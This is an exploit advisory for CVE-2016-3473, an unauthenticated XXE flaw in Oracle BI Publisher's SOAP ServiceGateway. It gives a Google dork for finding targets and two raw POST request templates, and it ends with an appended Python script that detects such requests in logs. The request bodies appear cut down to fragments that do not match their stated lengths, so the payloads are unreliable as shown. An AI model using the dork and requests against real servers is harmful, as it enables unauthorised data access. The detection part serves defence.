# Exploit Title: Oracle BI Publisher (formerly XML Publisher) - XML External Entity Injection w/o authentication
# Date: 20\10\2016
# Exploit Author: Jakub Palaczynski
# CVE : CVE-2016-3473
# Vendor Homepage: https://www.oracle.com/
# Version: 11.1.1.6.0, 11.1.1.7.0, 11.1.1.9.0, 12.2.1.0.0
# Info: Previous versions may also be vulnerable.
# Google Dork: inurl:xmlpserver or intitle:"Oracle BI Publisher Enterprise Login"

1. Vulnerable SOAP Action: replyToXML

POST /xmlpserver/services/ServiceGateway HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: #replyToXML
Host: vulnerablehost
Content-Length: 630

%remote;]>]]>

------------------------------------------------

2. Vulnerable SOAP Action: replyToXMLWithContext

POST /xmlpserver/services/ServiceGateway HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: #replyToXMLWithContext
Host: vulnerablehost
Content-Length: 646

%remote;]>]]>
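
Added example (not part of the original advisory, and not the author's or Oracle's code): a log-triage check that flags captured requests to the ServiceGateway endpoint which use either SOAP action named above and carry an inline DTD. The verdict names, the sample requests, the host bi.example and the choice to mark DTD-free calls to these actions as "review" are assumptions made for this example.

```python
import re

# Endpoint path and SOAPAction names come from the advisory above.
GATEWAY_PATH = "/xmlpserver/services/servicegateway"
FLAGGED_ACTIONS = {"replytoxml", "replytoxmlwithcontext"}
# Inline-DTD markers: DOCTYPE/ENTITY declarations or a parameter-entity reference.
DTD_MARKERS = re.compile(r"<!\s*(?:DOCTYPE|ENTITY)\b|%[A-Za-z_][\w.-]*;", re.I)

def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target = (lines[0].split() + ["", ""])[:2]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method.upper(), target.split("?", 1)[0], headers, body

def classify(raw):
    """Return 'alert', 'review' or 'ignore' for one captured request."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path.rstrip("/").lower() != GATEWAY_PATH:
        return "ignore"
    action = headers.get("soapaction", "").strip('"').rsplit("#", 1)[-1].lower()
    if action not in FLAGGED_ACTIONS:
        return "ignore"
    # The DTD may sit in CDATA or be entity-escaped inside the SOAP body.
    text = body.replace("&lt;", "<").replace("&gt;", ">")
    return "alert" if DTD_MARKERS.search(text) else "review"

# Constructed samples, not captured traffic; bodies are placeholders.
_POST = "POST /xmlpserver/services/ServiceGateway HTTP/1.1\r\nHost: bi.example\r\n"
SAMPLES = {
    "dtd_in_cdata": _POST + "SOAPAction: #replyToXML\r\n\r\n"
                    "<body><![CDATA[<!DOCTYPE r [ %remote;]>]]></body>",
    "escaped_dtd": _POST + 'SOAPAction: "#replyToXMLWithContext"\r\n\r\n'
                   "<body>&lt;!DOCTYPE r [ ]&gt;</body>",
    "no_dtd": _POST + "SOAPAction: #replyToXML\r\n\r\n<body>report</body>",
    "other_action": _POST + "SOAPAction: #hypotheticalAction\r\n\r\n<body/>",
    "login_page": "GET /xmlpserver/ HTTP/1.1\r\nHost: bi.example\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:14} {classify(raw)}")
```

The check needs request bodies, so it applies to proxy, WAF or packet-capture records rather than plain access logs.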